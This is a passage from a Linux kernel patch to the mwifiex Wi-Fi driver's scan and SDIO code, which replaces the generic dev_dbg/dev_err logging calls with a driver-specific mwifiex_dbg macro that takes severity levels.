+1706,16 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, beacon_period = le16_to_cpu(bcn_param->beacon_period); cap_info_bitmap = le16_to_cpu(bcn_param->cap_info_bitmap); - dev_dbg(adapter->dev, "info: InterpretIE: capabilities=0x%X\n", - cap_info_bitmap); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: capabilities=0x%X\n", + cap_info_bitmap); /* Rest of the current buffer are IE's */ ie_buf = current_ptr; ie_len = curr_bcn_bytes; - dev_dbg(adapter->dev, "info: InterpretIE: IELength for this AP = %d\n", - curr_bcn_bytes); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: IELength for this AP = %d\n", + curr_bcn_bytes); while (curr_bcn_bytes >= sizeof(struct ieee_types_header)) { u8 element_id, element_len; @@ -1698,8 +1724,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, element_len = *(current_ptr + 1); if (curr_bcn_bytes < element_len + sizeof(struct ieee_types_header)) { - dev_err(adapter->dev, - "%s: bytes left < IE length\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: bytes left < IE length\n", __func__); return -EFAULT; } if (element_id == WLAN_EID_DS_PARAMS) { @@ -1719,8 +1745,8 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, /* Skip entry if on csa closed channel */ if (channel == priv->csa_chan) { - dev_dbg(adapter->dev, - "Dropping entry on csa closed channel\n"); + mwifiex_dbg(adapter, WARN, + "Dropping entry on csa closed channel\n"); return 0; } @@ -1751,7 +1777,7 @@ mwifiex_parse_single_response_buf(struct mwifiex_private *priv, u8 **bss_info, cfg80211_put_bss(priv->wdev.wiphy, bss); } } else { - dev_dbg(adapter->dev, "missing BSS channel IE\n"); + 
mwifiex_dbg(adapter, WARN, "missing BSS channel IE\n"); } return 0; @@ -1765,7 +1791,8 @@ static void mwifiex_complete_scan(struct mwifiex_private *priv) if (adapter->curr_cmd->wait_q_enabled) { adapter->cmd_wait_q.status = 0; if (!priv->scan_request) { - dev_dbg(adapter->dev, "complete internal scan\n"); + mwifiex_dbg(adapter, INFO, + "complete internal scan\n"); mwifiex_complete_cmd(adapter, adapter->curr_cmd); } } @@ -1788,12 +1815,14 @@ static void mwifiex_check_next_scan_command(struct mwifiex_private *priv) mwifiex_complete_scan(priv); if (priv->scan_request) { - dev_dbg(adapter->dev, "info: notifying scan done\n"); + mwifiex_dbg(adapter, INFO, + "info: notifying scan done\n"); cfg80211_scan_done(priv->scan_request, 0); priv->scan_request = NULL; } else { priv->scan_aborting = false; - dev_dbg(adapter->dev, "info: scan already aborted\n"); + mwifiex_dbg(adapter, INFO, + "info: scan already aborted\n"); } } else if ((priv->scan_aborting && !priv->scan_request) || priv->scan_block) { @@ -1809,12 +1838,14 @@ static void mwifiex_check_next_scan_command(struct mwifiex_private *priv) spin_unlock_irqrestore(&adapter->mwifiex_cmd_lock, flags); if (priv->scan_request) { - dev_dbg(adapter->dev, "info: aborting scan\n"); + mwifiex_dbg(adapter, INFO, + "info: aborting scan\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; } else { priv->scan_aborting = false; - dev_dbg(adapter->dev, "info: scan already aborted\n"); + mwifiex_dbg(adapter, INFO, + "info: scan already aborted\n"); } } else { /* Get scan command from scan_pending_q and put to @@ -1877,8 +1908,9 @@ int mwifiex_ret_802_11_scan(struct mwifiex_private *priv, if (scan_rsp->number_of_sets > MWIFIEX_MAX_AP) { - dev_err(adapter->dev, "SCAN_RESP: too many AP returned (%d)\n", - scan_rsp->number_of_sets); + mwifiex_dbg(adapter, ERROR, + "SCAN_RESP: too many AP returned (%d)\n", + scan_rsp->number_of_sets); ret = -1; goto check_next_scan; } @@ -1887,14 +1919,15 @@ int mwifiex_ret_802_11_scan(struct mwifiex_private *priv, mwifiex_11h_get_csa_closed_channel(priv); bytes_left = le16_to_cpu(scan_rsp->bss_descript_size); - dev_dbg(adapter->dev, "info: SCAN_RESP: bss_descript_size %d\n", - bytes_left); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: bss_descript_size %d\n", + bytes_left); scan_resp_size = le16_to_cpu(resp->size); - dev_dbg(adapter->dev, - "info: SCAN_RESP: returned %d APs before parsing\n", - scan_rsp->number_of_sets); + mwifiex_dbg(adapter, INFO, + "info: SCAN_RESP: returned %d APs before parsing\n", + scan_rsp->number_of_sets); bss_info = scan_rsp->bss_desc_and_tlv_buffer; @@ -2007,13 +2040,13 @@ mwifiex_update_chan_statistics(struct mwifiex_private *priv, le16_to_cpu(fw_chan_stats->cca_scan_dur); chan_stats.cca_busy_dur = le16_to_cpu(fw_chan_stats->cca_busy_dur); - dev_dbg(adapter->dev, - "chan=%d, noise=%d, total_network=%d scan_duration=%d, busy_duration=%d\n", - chan_stats.chan_num, - chan_stats.noise, - chan_stats.total_bss, - chan_stats.cca_scan_dur, - chan_stats.cca_busy_dur); + mwifiex_dbg(adapter, INFO, + "chan=%d, noise=%d, total_network=%d scan_duration=%d, busy_duration=%d\n", + chan_stats.chan_num, + chan_stats.noise, + chan_stats.total_bss, + chan_stats.cca_scan_dur, + chan_stats.cca_busy_dur); memcpy(&adapter->chan_stats[adapter->survey_idx++], &chan_stats, sizeof(struct mwifiex_chan_stats)); fw_chan_stats++; @@ -2035,7 +2068,7 @@ int mwifiex_ret_802_11_scan_ext(struct mwifiex_private *priv, unsigned long cmd_flags, scan_flags; bool complete_scan = false; - dev_dbg(priv->adapter->dev, 
"info: EXT scan returns successfully\n"); + mwifiex_dbg(adapter, INFO, "info: EXT scan returns successfully\n"); ext_scan_resp = &resp->params.ext_scan; @@ -2048,8 +2081,8 @@ int mwifiex_ret_802_11_scan_ext(struct mwifiex_private *priv, len = le16_to_cpu(tlv->len); if (buf_left < (sizeof(struct mwifiex_ie_types_header) + len)) { - dev_err(adapter->dev, - "error processing scan response TLVs"); + mwifiex_dbg(adapter, ERROR, + "error processing scan response TLVs"); break; } @@ -2075,8 +2108,8 @@ int mwifiex_ret_802_11_scan_ext(struct mwifiex_private *priv, cmd_ptr = (void *)cmd_node->cmd_skb->data; if (le16_to_cpu(cmd_ptr->command) == HostCmd_CMD_802_11_SCAN_EXT) { - dev_dbg(priv->adapter->dev, - "Scan pending in command pending list"); + mwifiex_dbg(adapter, INFO, + "Scan pending in command pending list"); complete_scan = false; break; } @@ -2114,17 +2147,17 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, u16 scan_resp_size = le16_to_cpu(event_scan->buf_size); if (num_of_set > MWIFIEX_MAX_AP) { - dev_err(adapter->dev, - "EXT_SCAN: Invalid number of AP returned (%d)!!\n", - num_of_set); + mwifiex_dbg(adapter, ERROR, + "EXT_SCAN: Invalid number of AP returned (%d)!!\n", + num_of_set); ret = -1; goto check_next_scan; } bytes_left = scan_resp_size; - dev_dbg(adapter->dev, - "EXT_SCAN: size %d, returned %d APs...", - scan_resp_size, num_of_set); + mwifiex_dbg(adapter, INFO, + "EXT_SCAN: size %d, returned %d APs...", + scan_resp_size, num_of_set); mwifiex_dbg_dump(adapter, CMD_D, "EXT_SCAN buffer:", buf, scan_resp_size + sizeof(struct mwifiex_event_scan_result)); @@ -2135,7 +2168,8 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, type = le16_to_cpu(tlv->header.type); len = le16_to_cpu(tlv->header.len); if (bytes_left < sizeof(struct mwifiex_ie_types_header) + len) { - dev_err(adapter->dev, "EXT_SCAN: Error bytes left < TLV length\n"); + mwifiex_dbg(adapter, ERROR, + "EXT_SCAN: Error bytes left < TLV length\n"); break; } scan_rsp_tlv = NULL; @@ -2161,8 +2195,9 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, len = le16_to_cpu(tlv->header.len); if (bytes_left_for_tlv < sizeof(struct mwifiex_ie_types_header) + len) { - dev_err(adapter->dev, - "EXT_SCAN: Error in processing TLV, bytes left < TLV length\n"); + mwifiex_dbg(adapter, ERROR, + "EXT_SCAN: Error in processing TLV,\t" + "bytes left < TLV length\n"); scan_rsp_tlv = NULL; bytes_left_for_tlv = 0; continue; @@ -2202,8 +2237,8 @@ int mwifiex_handle_event_ext_scan_report(struct mwifiex_private *priv, if (scan_info_tlv) { rssi = (s32)(s16)(le16_to_cpu(scan_info_tlv->rssi)); rssi *= 100; /* Convert dBm to mBm */ - dev_dbg(adapter->dev, - "info: InterpretIE: RSSI=%d\n", rssi); + mwifiex_dbg(adapter, INFO, + "info: InterpretIE: RSSI=%d\n", rssi); fw_tsf = le64_to_cpu(scan_info_tlv->tsf); radio_type = &scan_info_tlv->radio_type; } else { @@ -2274,13 +2309,14 @@ static int mwifiex_scan_specific_ssid(struct mwifiex_private *priv, struct mwifiex_user_scan_cfg *scan_cfg; if (adapter->scan_processing) { - dev_err(adapter->dev, "cmd: Scan already in process...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan already in process...\n"); return -EBUSY; } if (priv->scan_block) { - dev_err(adapter->dev, - "cmd: Scan is blocked during association...\n"); + mwifiex_dbg(adapter, WARN, + "cmd: Scan is blocked during association...\n"); return -EBUSY; } @@ -2312,8 +2348,9 @@ int mwifiex_request_scan(struct mwifiex_private *priv, int ret; if (down_interruptible(&priv->async_sem)) { - 
dev_err(priv->adapter->dev, "%s: acquire semaphore\n", - __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: acquire semaphore fail\n", + __func__); return -1; } @@ -2403,8 +2440,9 @@ mwifiex_save_curr_bcn(struct mwifiex_private *priv) memcpy(priv->curr_bcn_buf, curr_bss->beacon_buf, curr_bss->beacon_buf_size); - dev_dbg(priv->adapter->dev, "info: current beacon saved %d\n", - priv->curr_bcn_size); + mwifiex_dbg(priv->adapter, INFO, + "info: current beacon saved %d\n", + priv->curr_bcn_size); curr_bss->beacon_buf = priv->curr_bcn_buf; diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index d10320f89bc1..f4b1de7977ab 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -166,7 +166,8 @@ static int mwifiex_sdio_resume(struct device *dev) adapter = card->adapter; if (!adapter->is_suspended) { - dev_warn(adapter->dev, "device already resumed\n"); + mwifiex_dbg(adapter, WARN, + "device already resumed\n"); return 0; } @@ -191,8 +192,6 @@ mwifiex_sdio_remove(struct sdio_func *func) struct mwifiex_adapter *adapter; struct mwifiex_private *priv; - pr_debug("info: SDIO func num=%d\n", func->num); - card = sdio_get_drvdata(func); if (!card) return; @@ -201,6 +200,8 @@ mwifiex_sdio_remove(struct sdio_func *func) if (!adapter || !adapter->priv_num) return; + mwifiex_dbg(adapter, INFO, "info: SDIO func num=%d\n", func->num); + if (user_rmmod) { if (adapter->is_suspended) mwifiex_sdio_resume(adapter->dev); @@ -257,12 +258,14 @@ static int mwifiex_sdio_suspend(struct device *dev) /* Enable the Host Sleep */ if (!mwifiex_enable_hs(adapter)) { - dev_err(adapter->dev, "cmd: failed to suspend\n"); + mwifiex_dbg(adapter, ERROR, + "cmd: failed to suspend\n"); adapter->hs_enabling = false; return -EFAULT; } - dev_dbg(adapter->dev, "cmd: suspend with MMC_PM_KEEP_POWER\n"); + mwifiex_dbg(adapter, INFO, + "cmd: suspend with MMC_PM_KEEP_POWER\n"); ret = sdio_set_host_pm_flags(func, MMC_PM_KEEP_POWER); /* Indicate device suspended */ @@ -386,8 +389,8 @@ mwifiex_write_data_sync(struct mwifiex_adapter *adapter, u32 ioport = (port & MWIFIEX_SDIO_IO_PORT_MASK); if (adapter->is_suspended) { - dev_err(adapter->dev, - "%s: not allowed while suspended\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: not allowed while suspended\n", __func__); return -1; } @@ -434,7 +437,8 @@ static int mwifiex_read_data_sync(struct mwifiex_adapter *adapter, u8 *buffer, */ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "event: wakeup device...\n"); + mwifiex_dbg(adapter, EVENT, + "event: wakeup device...\n"); return mwifiex_write_reg(adapter, CONFIGURATION_REG, HOST_POWER_UP); } @@ -446,7 +450,8 @@ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) */ static int mwifiex_pm_wakeup_card_complete(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "cmd: wakeup device completed\n"); + mwifiex_dbg(adapter, EVENT, + "cmd: wakeup device completed\n"); return mwifiex_write_reg(adapter, CONFIGURATION_REG, 0); } @@ -524,7 +529,8 @@ static int mwifiex_init_sdio_ioport(struct mwifiex_adapter *adapter) else return -1; cont: - pr_debug("info: SDIO FUNC1 IO port: %#x\n", adapter->ioport); + mwifiex_dbg(adapter, INFO, + "info: SDIO FUNC1 IO port: %#x\n", adapter->ioport); /* Set Host interrupt reset to read to clear */ if (!mwifiex_read_reg(adapter, card->reg->host_int_rsr_reg, ®)) @@ -556,10 +562,12 @@ static int mwifiex_write_data_to_card(struct mwifiex_adapter *adapter, ret = 
mwifiex_write_data_sync(adapter, payload, pkt_len, port); if (ret) { i++; - dev_err(adapter->dev, "host_to_card, write iomem" - " (%d) failed: %d\n", i, ret); + mwifiex_dbg(adapter, ERROR, + "host_to_card, write iomem\t" + "(%d) failed: %d\n", i, ret); if (mwifiex_write_reg(adapter, CONFIGURATION_REG, 0x04)) - dev_err(adapter->dev, "write CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "write CFG reg failed\n"); ret = -1; if (i > MAX_WRITE_IOMEM_RETRY) @@ -584,7 +592,8 @@ static int mwifiex_get_rd_port(struct mwifiex_adapter *adapter, u8 *port) const struct mwifiex_sdio_card_reg *reg = card->reg; u32 rd_bitmap = card->mp_rd_bitmap; - dev_dbg(adapter->dev, "data: mp_rd_bitmap=0x%08x\n", rd_bitmap); + mwifiex_dbg(adapter, DATA, + "data: mp_rd_bitmap=0x%08x\n", rd_bitmap); if (card->supports_sdio_new_mode) { if (!(rd_bitmap & reg->data_port_mask)) @@ -598,8 +607,9 @@ static int mwifiex_get_rd_port(struct mwifiex_adapter *adapter, u8 *port) (card->mp_rd_bitmap & CTRL_PORT_MASK)) { card->mp_rd_bitmap &= (u32) (~CTRL_PORT_MASK); *port = CTRL_PORT; - dev_dbg(adapter->dev, "data: port=%d mp_rd_bitmap=0x%08x\n", - *port, card->mp_rd_bitmap); + mwifiex_dbg(adapter, DATA, + "data: port=%d mp_rd_bitmap=0x%08x\n", + *port, card->mp_rd_bitmap); return 0; } @@ -613,9 +623,9 @@ static int mwifiex_get_rd_port(struct mwifiex_adapter *adapter, u8 *port) if (++card->curr_rd_port == card->max_ports) card->curr_rd_port = reg->start_rd_port; - dev_dbg(adapter->dev, - "data: port=%d mp_rd_bitmap=0x%08x -> 0x%08x\n", - *port, rd_bitmap, card->mp_rd_bitmap); + mwifiex_dbg(adapter, DATA, + "data: port=%d mp_rd_bitmap=0x%08x -> 0x%08x\n", + *port, rd_bitmap, card->mp_rd_bitmap); return 0; } @@ -633,7 +643,8 @@ static int mwifiex_get_wr_port_data(struct mwifiex_adapter *adapter, u32 *port) const struct mwifiex_sdio_card_reg *reg = card->reg; u32 wr_bitmap = card->mp_wr_bitmap; - dev_dbg(adapter->dev, "data: mp_wr_bitmap=0x%08x\n", wr_bitmap); + mwifiex_dbg(adapter, DATA, + "data: mp_wr_bitmap=0x%08x\n", wr_bitmap); if (!(wr_bitmap & card->mp_data_port_mask)) { adapter->data_sent = true; @@ -651,15 +662,16 @@ static int mwifiex_get_wr_port_data(struct mwifiex_adapter *adapter, u32 *port) } if ((card->has_control_mask) && (*port == CTRL_PORT)) { - dev_err(adapter->dev, - "invalid data port=%d cur port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", - *port, card->curr_wr_port, wr_bitmap, - card->mp_wr_bitmap); + mwifiex_dbg(adapter, ERROR, + "invalid data port=%d cur port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", + *port, card->curr_wr_port, wr_bitmap, + card->mp_wr_bitmap); return -1; } - dev_dbg(adapter->dev, "data: port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", - *port, wr_bitmap, card->mp_wr_bitmap); + mwifiex_dbg(adapter, DATA, + "data: port=%d mp_wr_bitmap=0x%08x -> 0x%08x\n", + *port, wr_bitmap, card->mp_wr_bitmap); return 0; } @@ -683,7 +695,8 @@ mwifiex_sdio_poll_card_status(struct mwifiex_adapter *adapter, u8 bits) usleep_range(10, 20); } - dev_err(adapter->dev, "poll card status failed, tries = %d\n", tries); + mwifiex_dbg(adapter, ERROR, + "poll card status failed, tries = %d\n", tries); return -1; } @@ -738,7 +751,7 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) if (mwifiex_read_data_sync(adapter, card->mp_regs, card->reg->max_mp_regs, REG_PORT | MWIFIEX_SDIO_BYTE_MODE_MASK, 0)) { - dev_err(adapter->dev, "read mp_regs failed\n"); + mwifiex_dbg(adapter, ERROR, "read mp_regs failed\n"); return; } @@ -751,7 +764,8 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) * 
UP_LD_CMD_PORT_HOST_INT_STATUS * Clear the interrupt status register */ - dev_dbg(adapter->dev, "int: sdio_ireg = %#x\n", sdio_ireg); + mwifiex_dbg(adapter, INTR, + "int: sdio_ireg = %#x\n", sdio_ireg); spin_lock_irqsave(&adapter->int_lock, flags); adapter->int_status |= sdio_ireg; spin_unlock_irqrestore(&adapter->int_lock, flags); @@ -802,7 +816,8 @@ static int mwifiex_sdio_enable_host_int(struct mwifiex_adapter *adapter) /* Request the SDIO IRQ */ ret = sdio_claim_irq(func, mwifiex_sdio_interrupt); if (ret) { - dev_err(adapter->dev, "claim irq failed: ret=%d\n", ret); + mwifiex_dbg(adapter, ERROR, + "claim irq failed: ret=%d\n", ret); goto out; } @@ -810,7 +825,8 @@ static int mwifiex_sdio_enable_host_int(struct mwifiex_adapter *adapter) ret = mwifiex_write_reg_locked(func, card->reg->host_int_mask_reg, card->reg->host_int_enable); if (ret) { - dev_err(adapter->dev, "enable host interrupt failed\n"); + mwifiex_dbg(adapter, ERROR, + "enable host interrupt failed\n"); sdio_release_irq(func); } @@ -830,22 +846,25 @@ static int mwifiex_sdio_card_to_host(struct mwifiex_adapter *adapter, u32 nb; if (!buffer) { - dev_err(adapter->dev, "%s: buffer is NULL\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: buffer is NULL\n", __func__); return -1; } ret = mwifiex_read_data_sync(adapter, buffer, npayload, ioport, 1); if (ret) { - dev_err(adapter->dev, "%s: read iomem failed: %d\n", __func__, + mwifiex_dbg(adapter, ERROR, + "%s: read iomem failed: %d\n", __func__, ret); return -1; } nb = le16_to_cpu(*(__le16 *) (buffer)); if (nb > npayload) { - dev_err(adapter->dev, "%s: invalid packet, nb=%d npayload=%d\n", - __func__, nb, npayload); + mwifiex_dbg(adapter, ERROR, + "%s: invalid packet, nb=%d npayload=%d\n", + __func__, nb, npayload); return -1; } @@ -877,13 +896,14 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, u32 i = 0; if (!firmware_len) { - dev_err(adapter->dev, - "firmware image not found! Terminating download\n"); + mwifiex_dbg(adapter, ERROR, + "firmware image not found! Terminating download\n"); return -1; } - dev_dbg(adapter->dev, "info: downloading FW image (%d bytes)\n", - firmware_len); + mwifiex_dbg(adapter, INFO, + "info: downloading FW image (%d bytes)\n", + firmware_len); /* Assume that the allocated buffer is 8-byte aligned */ fwbuf = kzalloc(MWIFIEX_UPLD_SIZE, GFP_KERNEL); @@ -897,8 +917,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, ret = mwifiex_sdio_poll_card_status(adapter, CARD_IO_READY | DN_LD_CARD_RDY); if (ret) { - dev_err(adapter->dev, "FW download with helper:" - " poll status timeout @ %d\n", offset); + mwifiex_dbg(adapter, ERROR, + "FW download with helper:\t" + "poll status timeout @ %d\n", offset); goto done; } @@ -910,19 +931,19 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, ret = mwifiex_read_reg(adapter, reg->base_0_reg, &base0); if (ret) { - dev_err(adapter->dev, - "dev BASE0 register read failed: " - "base0=%#04X(%d). Terminating dnld\n", - base0, base0); + mwifiex_dbg(adapter, ERROR, + "dev BASE0 register read failed:\t" + "base0=%#04X(%d). Terminating dnld\n", + base0, base0); goto done; } ret = mwifiex_read_reg(adapter, reg->base_1_reg, &base1); if (ret) { - dev_err(adapter->dev, - "dev BASE1 register read failed: " - "base1=%#04X(%d). Terminating dnld\n", - base1, base1); + mwifiex_dbg(adapter, ERROR, + "dev BASE1 register read failed:\t" + "base1=%#04X(%d). 
Terminating dnld\n", + base1, base1); goto done; } len = (u16) (((base1 & 0xff) << 8) | (base0 & 0xff)); @@ -936,9 +957,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (!len) { break; } else if (len > MWIFIEX_UPLD_SIZE) { - dev_err(adapter->dev, - "FW dnld failed @ %d, invalid length %d\n", - offset, len); + mwifiex_dbg(adapter, ERROR, + "FW dnld failed @ %d, invalid length %d\n", + offset, len); ret = -1; goto done; } @@ -948,14 +969,15 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (len & BIT(0)) { i++; if (i > MAX_WRITE_IOMEM_RETRY) { - dev_err(adapter->dev, - "FW dnld failed @ %d, over max retry\n", - offset); + mwifiex_dbg(adapter, ERROR, + "FW dnld failed @ %d, over max retry\n", + offset); ret = -1; goto done; } - dev_err(adapter->dev, "CRC indicated by the helper:" - " len = 0x%04X, txlen = %d\n", len, txlen); + mwifiex_dbg(adapter, ERROR, + "CRC indicated by the helper:\t" + "len = 0x%04X, txlen = %d\n", len, txlen); len &= ~BIT(0); /* Setting this to 0 to resend from same offset */ txlen = 0; @@ -978,11 +1000,12 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, MWIFIEX_SDIO_BLOCK_SIZE, adapter->ioport); if (ret) { - dev_err(adapter->dev, - "FW download, write iomem (%d) failed @ %d\n", - i, offset); + mwifiex_dbg(adapter, ERROR, + "FW download, write iomem (%d) failed @ %d\n", + i, offset); if (mwifiex_write_reg(adapter, CONFIGURATION_REG, 0x04)) - dev_err(adapter->dev, "write CFG reg failed\n"); + mwifiex_dbg(adapter, ERROR, + "write CFG reg failed\n"); ret = -1; goto done; @@ -991,8 +1014,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, offset += txlen; } while (true); - dev_notice(adapter->dev, - "info: FW download over, size %d bytes\n", offset); + mwifiex_dbg(adapter, MSG, + "info: FW download over, size %d bytes\n", offset); ret = 0; done: @@ -1066,18 +1089,20 @@ static void mwifiex_deaggr_sdio_pkt(struct mwifiex_adapter *adapter, blk_num = *(data + BLOCK_NUMBER_OFFSET); blk_size = adapter->sdio_rx_block_size * blk_num; if (blk_size > total_pkt_len) { - dev_err(adapter->dev, "%s: error in pkt,\t" - "blk_num=%d, blk_size=%d, total_pkt_len=%d\n", - __func__, blk_num, blk_size, total_pkt_len); + mwifiex_dbg(adapter, ERROR, + "%s: error in blk_size,\t" + "blk_num=%d, blk_size=%d, total_pkt_len=%d\n", + __func__, blk_num, blk_size, total_pkt_len); break; } pkt_len = le16_to_cpu(*(__le16 *)(data + SDIO_HEADER_OFFSET)); pkt_type = le16_to_cpu(*(__le16 *)(data + SDIO_HEADER_OFFSET + 2)); if ((pkt_len + SDIO_HEADER_OFFSET) > blk_size) { - dev_err(adapter->dev, "%s: error in pkt,\t" - "pkt_len=%d, blk_size=%d\n", - __func__, pkt_len, blk_size); + mwifiex_dbg(adapter, ERROR, + "%s: error in pkt_len,\t" + "pkt_len=%d, blk_size=%d\n", + __func__, pkt_len, blk_size); break; } skb_deaggr = mwifiex_alloc_dma_align_buf(pkt_len, @@ -1116,7 +1141,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, switch (upld_typ) { case MWIFIEX_TYPE_AGGR_DATA: - dev_dbg(adapter->dev, "info: --- Rx: Aggr Data packet ---\n"); + mwifiex_dbg(adapter, INFO, + "info: --- Rx: Aggr Data packet ---\n"); rx_info = MWIFIEX_SKB_RXCB(skb); rx_info->buf_type = MWIFIEX_TYPE_AGGR_DATA; if (adapter->rx_work_enabled) { @@ -1130,7 +1156,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; case MWIFIEX_TYPE_DATA: - dev_dbg(adapter->dev, "info: --- Rx: Data packet ---\n"); + mwifiex_dbg(adapter, DATA, + "info: --- Rx: Data packet ---\n"); if (adapter->rx_work_enabled) { 
skb_queue_tail(&adapter->rx_data_q, skb); adapter->data_received = true; @@ -1141,7 +1168,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; case MWIFIEX_TYPE_CMD: - dev_dbg(adapter->dev, "info: --- Rx: Cmd Response ---\n"); + mwifiex_dbg(adapter, CMD, + "info: --- Rx: Cmd Response ---\n"); /* take care of curr_cmd = NULL case */ if (!adapter->curr_cmd) { cmd_buf = adapter->upld_buf; @@ -1163,7 +1191,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; case MWIFIEX_TYPE_EVENT: - dev_dbg(adapter->dev, "info: --- Rx: Event ---\n"); + mwifiex_dbg(adapter, EVENT, + "info: --- Rx: Event ---\n"); adapter->event_cause = le32_to_cpu(*(__le32 *) skb->data); if ((skb->len > 0) && (skb->len < MAX_EVENT_SIZE)) @@ -1178,7 +1207,8 @@ static int mwifiex_decode_rx_packet(struct mwifiex_adapter *adapter, break; default: - dev_err(adapter->dev, "unknown upload type %#x\n", upld_typ); + mwifiex_dbg(adapter, ERROR, + "unknown upload type %#x\n", upld_typ); dev_kfree_skb_any(skb); break; } @@ -1210,16 +1240,18 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, if ((card->has_control_mask) && (port == CTRL_PORT)) { /* Read the command Resp without aggr */ - dev_dbg(adapter->dev, "info: %s: no aggregation for cmd " - "response\n", __func__); + mwifiex_dbg(adapter, CMD, + "info: %s: no aggregation for cmd\t" + "response\n", __func__); f_do_rx_cur = 1; goto rx_curr_single; } if (!card->mpa_rx.enabled) { - dev_dbg(adapter->dev, "info: %s: rx aggregation disabled\n", - __func__); + mwifiex_dbg(adapter, WARN, + "info: %s: rx aggregation disabled\n", + __func__); f_do_rx_cur = 1; goto rx_curr_single; @@ -1230,7 +1262,8 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, (card->has_control_mask && (card->mp_rd_bitmap & (~((u32) CTRL_PORT_MASK))))) { /* Some more data RX pending */ - dev_dbg(adapter->dev, "info: %s: not last packet\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: not last packet\n", __func__); if (MP_RX_AGGR_IN_PROGRESS(card)) { if (MP_RX_AGGR_BUF_HAS_ROOM(card, rx_len)) { @@ -1247,7 +1280,8 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, } else { /* No more data RX pending */ - dev_dbg(adapter->dev, "info: %s: last packet\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: last packet\n", __func__); if (MP_RX_AGGR_IN_PROGRESS(card)) { f_do_rx_aggr = 1; @@ -1262,14 +1296,16 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, } if (f_aggr_cur) { - dev_dbg(adapter->dev, "info: current packet aggregation\n"); + mwifiex_dbg(adapter, INFO, + "info: current packet aggregation\n"); /* Curr pkt can be aggregated */ mp_rx_aggr_setup(card, rx_len, port); if (MP_RX_AGGR_PKT_LIMIT_REACHED(card) || mp_rx_aggr_port_limit_reached(card)) { - dev_dbg(adapter->dev, "info: %s: aggregated packet " - "limit reached\n", __func__); + mwifiex_dbg(adapter, INFO, + "info: %s: aggregated packet\t" + "limit reached\n", __func__); /* No more pkts allowed in Aggr buf, rx it */ f_do_rx_aggr = 1; } @@ -1277,8 +1313,9 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, if (f_do_rx_aggr) { /* do aggr RX now */ - dev_dbg(adapter->dev, "info: do_rx_aggr: num of packets: %d\n", - card->mpa_rx.pkt_cnt); + mwifiex_dbg(adapter, DATA, + "info: do_rx_aggr: num of packets: %d\n", + card->mpa_rx.pkt_cnt); if (card->supports_sdio_new_mode) { int i; @@ -1318,8 +1355,9 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct 
mwifiex_adapter *adapter, GFP_KERNEL | GFP_DMA); if (!skb_deaggr) { - dev_err(adapter->dev, "skb allocation failure drop pkt len=%d type=%d\n", - pkt_len, pkt_type); + mwifiex_dbg(adapter, ERROR, "skb allocation failure\t" + "drop pkt len=%d type=%d\n", + pkt_len, pkt_type); curr_ptr += len_arr[pind]; continue; } @@ -1339,12 +1377,12 @@ static int mwifiex_sdio_card_to_host_mp_aggr(struct mwifiex_adapter *adapter, mwifiex_decode_rx_packet(adapter, skb_deaggr, pkt_type); } else { - dev_err(adapter->dev, " drop wrong aggr pkt:\t" - "sdio_single_port_rx_aggr=%d\t" - "type=%d len=%d max_len=%d\n", - adapter->sdio_rx_aggr_enable, - pkt_type, pkt_len, - len_arr[pind]); + mwifiex_dbg(adapter, ERROR, + "drop wrong aggr pkt:\t" + "sdio_single_port_rx_aggr=%d\t" + "type=%d len=%d max_len=%d\n", + adapter->sdio_rx_aggr_enable, + pkt_type, pkt_len, len_arr[pind]); dev_kfree_skb_any(skb_deaggr); } curr_ptr += len_arr[pind]; @@ -1354,13 +1392,14 @@ static int 